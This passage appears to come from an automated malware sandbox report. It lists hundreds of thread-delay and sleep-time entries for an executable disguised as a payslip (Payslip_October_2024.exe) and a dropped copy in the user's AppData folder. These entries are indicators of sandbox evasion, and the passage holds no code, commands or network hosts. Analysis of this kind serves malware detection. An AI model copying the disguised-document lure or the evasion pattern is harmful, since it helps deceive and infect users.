                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597529Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596233Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595136Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598762
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596025
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594936
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594609
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWindow / User API: threadDelayed 3380Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWindow / User API: threadDelayed 6455Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 4178Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 5278Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7582
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2283
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599511s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599369s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599263s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -599151s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598991s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598815s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598357s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598116s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597794s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596373s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596153s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -596004s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595760s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -595108s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808Thread sleep time: -594125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6228Thread sleep count: 4178 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6228Thread sleep count: 5278 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -598094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597749s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597529s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -597078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596233s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -596015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -595875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -595765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -595522s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -595136s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -595025s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594248s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176Thread sleep time: -594141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -599094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598762s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -598000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -597015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596358s >= -30000s
